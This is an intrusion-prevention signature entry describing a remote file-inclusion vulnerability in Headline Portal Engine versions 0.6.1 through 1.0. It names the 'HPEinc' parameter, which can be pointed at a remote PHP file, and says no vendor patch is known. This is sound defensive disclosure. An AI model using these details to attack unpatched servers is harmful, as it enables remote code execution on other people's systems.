Intrusion Prevention
Headline.Portal.Engine.HPEInc.File.Inclusion
Description
HPE has multiple remote file-include vulnerabilities. A remote attacker could execute arbitrary scripts on the web server with the privileges of the server, via a specially-crafted URL request to multiple script pages, by using the 'HPEinc' parameter to specify a malicious PHP file from a remote system.
Affected Products
HPE version 0.6.1.
HPE version 0.6.5
HPE version 0.7.0
HPE version 1.0
Impact
Gain Access.
Recommended Actions
Currently we are not aware of any vendor-supplied patches for this issue.
http://freshmeat.net/projects/hpe/